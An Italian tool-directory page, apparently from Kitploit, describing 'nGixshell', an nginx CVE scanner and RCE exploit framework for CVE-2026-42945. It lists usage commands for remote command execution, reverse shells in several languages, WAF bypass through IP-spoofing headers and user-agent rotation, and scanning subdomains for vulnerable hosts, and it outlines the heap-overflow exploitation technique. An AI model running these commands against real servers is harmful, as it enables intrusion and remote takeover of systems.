Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
nGixshell — scanner CVE per nginx + framework di exploit RCE (CVE-2026-42945 + altre 16) | Kitploit
Strumenti/GitHubGitHub/mateusverass/ngixshell
RicognizioneScanner di VulnerabilitàFramework di ExploitSfruttamento di Applicazioni WebBypass WAFSicurezza WebPenetration TestingCommand and ControlEnumerazione SottodominiRed TeamingSviluppo Payload
2183 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHub
mateusverass/ngixshell

nGixshell

scanner CVE per nginx + framework di exploit RCE (CVE-2026-42945 + altre 16)

Vedi Repository
Condividi
nGixShell

Python CVEs Zero deps License


nGixShell è uno scanner per CVE di nginx e un framework di exploit RCE. Include una proof-of-concept funzionante per CVE-2026-42945 — un heap buffer overflow critico in ngx_http_rewrite_module — e uno scanner che copre 53 CVE di nginx con probe HTTP automatizzati, fingerprinting, rilevamento/bypass WAF, audit di sicurezza web e generazione di report.

Zero dipendenze esterne. Solo libreria standard Python 3.


Avvio rapido

root@kitploit:~
# Avvia il laboratorio vulnerabile
docker compose -f env/docker-compose.yml up -d

# Modalità automatica — fingerprint + scansione CVE + audit web
python3 ngixshell.py 127.0.0.1:19321

# Esegui un comando via RCE (CVE-2026-42945)
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id'

# Avvia una reverse shell (IP rilevato automaticamente)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# Rileva e bypassa il WAF, poi scansiona
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass

# Scansione sottodomini
python3 ngixshell.py --subdomain-scan example.com --scan-port 443

# Più target da un file
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

Nessun flag richiesto — puntare lo strumento a un target esegue automaticamente tutto.
TLS è rilevato automaticamente. nginx viene fingerprintizzato anche con server_tokens off.


Utilizzo

root@kitploit:~
python3 ngixshell.py [TARGET] [OPZIONI]

Formati TARGET:
  127.0.0.1
  192.168.1.10:8080
  http://192.168.1.10:8080
  https://target.local

Modalità

Rilevamento e bypass WAF

FlagDescrizione
--waf-detectRileva il WAF prima della scansione
--waf-bypassAbilita tutte le tecniche di bypass (esegue anche il rilevamento)
--waf-ip IPSpoofa questo IP negli header di bypass (default: RFC1918 casuale)

Tecniche di bypass (tutte attive quando è impostato --waf-bypass):

WAF rilevati: Cloudflare, AWS WAF, Akamai, Imperva/Incapsula, ModSecurity, F5 BIG-IP ASM, Sucuri, Barracuda, NAXSI, Fastly, Wordfence

Audit web

Viene eseguito automaticamente in modalità scansione. Tutti i moduli possono essere saltati singolarmente.

  • Audit header — HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy, header che rivelano la versione
  • Scoperta path — 50+ path; probe sentinella elimina i falsi positivi da regole catch-all 403/301
  • Enumerazione host virtuali — richiede la differenza sia di status che di body per evitare falsi positivi dal blocco predefinito
  • Audit TLS — testa il supporto TLS 1.0–1.3, la scadenza dei certificati e il rilevamento dei certificati self-signed
  • stub_status — analizza le metriche delle connessioni attive da /nginx_status se esposto

Connessione

FlagDescrizione
--port PORTSovrascrive la porta
--tls

HTTP

FlagDescrizione
--user-agent UAUser-Agent personalizzato
--auth USER:PASSAutenticazione HTTP Basic

Rate / Timing

FlagDescrizione
--rate-limit RPSMassimo numero di richieste al secondo
--jitter MS

Output

FlagDescrizione

Copertura CVE

53 voci dal 2009 al 2026. Ordinate per CVSS.


Il Bug (CVE-2026-42945)

Il motore degli script di rewrite di nginx usa un modello a due passate: calcola la dimensione del buffer, poi copia. Il flag is_args viene impostato sul motore principale quando una sostituzione rewrite contiene ?, ma la passata di calcolo della lunghezza viene eseguita su un sub-engine appena azzerato:

  • Passata di lunghezza — vede is_args = 0 → restituisce la lunghezza grezza della cattura
  • Passata di copia — vede is_args = 1 → chiama ngx_escape_uri(NGX_ESCAPE_ARGS), espandendo ogni byte non sicuro a 3 byte

La copia fa overflow del buffer heap sottodimensionato con dati URI controllati dall'attaccante. L'exploitation corrompe un puntatore di cleanup adiacente di ngx_pool_t tramite heap feng shui tra richieste, reindirizzandolo a un falso ngx_pool_cleanup_s che chiama system() alla distruzione del pool.

Versioni interessate

ProdottoVulnerabileCorretta
NGINX Open Source0.6.27 – 1.30.01.31.0, 1.30.1
NGINX PlusR32 – R36R36 P4, R35 P2, R32 P6

Advisory del vendor: https://my.f5.com/manage/s/article/K000160932


Setup del laboratorio

Testato su Ubuntu 24.04 LTS. Richiede Docker e Python 3.8+.

root@kitploit:~
# Avvia il laboratorio vulnerabile (nginx 1.25.3)
docker compose -f env/docker-compose.yml up -d

# Scansione completa
python3 ngixshell.py 127.0.0.1:19321

# RCE con output JSON
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id' --json

# Reverse shell — payload bash, auto-upgrade PTY
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell

# Scansione con bypass WAF e IP spoofato
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass --waf-ip 10.10.10.1

# Attraverso proxy SOCKS5
python3 ngixshell.py 192.168.1.10 --proxy socks5://127.0.0.1:9050

# Scansione sottodomini con rate limiting
python3 ngixshell.py --subdomain-scan example.com --scan-port 443 --rate-limit 10

# Più target, output JSON, report HTML
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html

Disclaimer

Solo per test di sicurezza autorizzati, competizioni CTF e ricerca.

Scarica lo strumento
FlagDescrizione
(nessuno)Auto — fingerprint + scansione CVE + audit web
--cmd 'CMD'Esegui un comando via CVE-2026-42945 RCE
--cmd-file FILEEsegui comandi da file (uniti con ;)
--shellAvvia una reverse shell
--shell-type TYPEPayload: bash python perl php nc powershell (default: python)
--upgrade-shellInvia automaticamente l'upgrade PTY dopo la connessione della shell
--subdomain-scan DOMAINTrova nginx vulnerabili nei sottodomini
--cve CVE-IDTesta una CVE specifica
--list-cvesStampa tutte le 53 CVE con CVSS e informazioni sui probe
--list-candidatesStampa i candidati per gli indirizzi heap
--dry-runSolo fingerprint + scansione, nessun exploit
--target-file FILEScansiona più host da un file
TecnicaDettaglio
Spoofing IPX-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP
Rotazione UA11 User-Agent reali di browser/bot, randomizzati per richiesta
Offuscamento del pathdoppio slash, padding /./, percent-encoding, variazione di maiuscole/minuscole
Shuffle del case degli headerrandomizza il casing dei nomi degli header per rompere il pattern matching del WAF
FlagDescrizione
--skip-headersSalta l'audit degli header di sicurezza HTTP
--skip-pathsSalta la scoperta di path/file
--skip-vhostsSalta l'enumerazione degli host virtuali
--skip-tlsSalta l'audit del protocollo TLS
--path-wordlist FILEPath aggiuntivi da sondare (uno per riga)
Forza TLS (rilevato automaticamente di default)
--proxy URLProxy: http://, https://, socks5://
--cookie VALUE
Header Cookie
--header NAME:VALUEHeader aggiuntivo (ripetibile)
Ritardo casuale 0–MS ms tra le richieste
--retry NRiprova i probe inconcludenti (default: 1)
--timeout-multiplier XScala tutti i timeout (default: 1.0)
--output FILE
Scrive il log su FILE
--jsonStampa un riepilogo JSON alla fine
--html-report [FILE]Genera un report HTML (default: ngixshell_<host>_<ts>.html)
--verboseOutput di debug
CVECVSSComponenteDescrizione
CVE-2026-429459.8 CRITICALrewriteHeap overflow → RCE (exploitato)
CVE-2026-429468.1 HIGHrewriteCorruzione della memoria (stesso advisory)
CVE-2022-417417.8 HIGHmp4Corruzione della memoria tramite mp4 malizioso
CVE-2016-12477.8 HIGHpackagingEscalation di privilegi tramite symlink nei file di log
CVE-2021-230177.7 HIGHresolverOff-by-one heap overwrite
CVE-2026-407017.5 HIGHrequestCorruzione della memoria nell'elaborazione delle richieste
CVE-2026-429347.5 HIGHrequestCorruzione della memoria (stesso advisory)
CVE-2026-277847.5 HIGHmp4Buffer overflow tramite mp4 modificato
CVE-2026-326477.5 HIGHmp4Buffer overflow (gemello del precedente)
CVE-2024-249907.5 HIGHHTTP/3Use-after-free nel modulo QUIC
CVE-2024-249897.5 HIGHHTTP/3Null pointer dereference in QUIC
CVE-2024-310797.5 HIGHHTTP/3Stack overflow nell'encoder QUIC
CVE-2024-327607.5 HIGHHTTP/3Buffer overwrite tramite frame HEADERS
CVE-2022-417427.5 HIGHmp4Divulgazione di memoria heap
CVE-2017-75297.5 HIGHrange filterInteger overflow → lettura fuori dai limiti
CVE-2016-07467.5 HIGHresolverUse-after-free tramite risposta DNS modificata
CVE-2014-01337.5 HIGHSPDYHeap overflow nell'implementazione SPDY
CVE-2014-00887.5 HIGHSPDYCorruzione della memoria in SPDY
CVE-2013-45477.5 HIGHcoreBypass URI con Spazio+NUL
CVE-2013-20287.5 HIGHcoreStack overflow nella codifica chunked
CVE-2012-11807.5 HIGHproxyUse-after-free nel modulo proxy
CVE-2009-35557.5 HIGHSSLIniezione di renegotiation TLS (MITM)
CVE-2009-26297.5 HIGHcoreBuffer underflow nel parsing dell'URI
CVE-2026-429266.5 MEDIUMHTTP/2Request splitting tramite proxy
CVE-2026-276546.5 MEDIUMWebDAVHeap overflow nel modulo DAV
CVE-2026-287536.5 MEDIUMmailHeader injection nel proxy mail
CVE-2026-16426.5 MEDIUMproxyLeak di riutilizzo della sessione SSL upstream
CVE-2019-95116.5 MEDIUMHTTP/2Data Dribble DoS di CPU/memoria
CVE-2012-20896.8 MEDIUMmp4Buffer overflow tramite richiesta mp4
CVE-2018-168455.5 MEDIUMmp4Integer underflow → crash + divulgazione
CVE-2019-203725.3 MEDIUMproxyHTTP request smuggling
CVE-2026-404605.3 MEDIUMHTTP/3Spoofing della connessione QUIC
CVE-2026-287555.3 MEDIUMSSLDivulgazione di memoria nell'elaborazione OCSP
CVE-2025-234195.3 MEDIUMSSLBypass del certificato nella riassunzione della sessione TLS
CVE-2024-352005.3 MEDIUMHTTP/3Null pointer dereference
CVE-2024-341615.3 MEDIUMHTTP/3Divulgazione di memoria
CVE-2016-44505.3 MEDIUMcoreNull pointer tramite body di richiesta chunked
CVE-2016-07425.0 MEDIUMresolverPuntatore non valido tramite pacchetto UDP modificato
CVE-2016-07475.0 MEDIUMresolverLimite di risoluzione CNAME insufficiente
CVE-2014-35565.0 MEDIUMmailIniezione di comandi STARTTLS
CVE-2013-20705.3 MEDIUMproxyDivulgazione della risposta del backend
CVE-2011-49635.0 MEDIUMaccessBypass del controllo di accesso con literal IPv6
CVE-2011-43155.0 MEDIUMresolverHeap overflow tramite risposta DNS modificata
CVE-2009-38965.0 MEDIUMcoreNull pointer dereference DoS
CVE-2025-538594.3 MEDIUMmailIniezione di comandi SMTP
CVE-2014-36164.3 MEDIUMSSLConfusione di host virtuale TLS SNI
CVE-2026-276514.3 MEDIUMmailNull pointer dereference nel proxy mail
CVE-2019-95134.3 MEDIUMHTTP/2Resource Loop DoS di CPU
CVE-2019-95164.3 MEDIUMHTTP/2Esaurimento della memoria con header a 0 lunghezza
CVE-2018-168434.3 MEDIUMHTTP/2Consumo eccessivo di memoria
CVE-2018-168444.3 MEDIUMHTTP/2CPU eccessiva tramite frame SETTINGS
CVE-2024-73474.7 MEDIUMmp4Lettura fuori dai limiti
CVE-2009-38984.9 MEDIUMWebDAVDirectory traversal tramite COPY/MOVE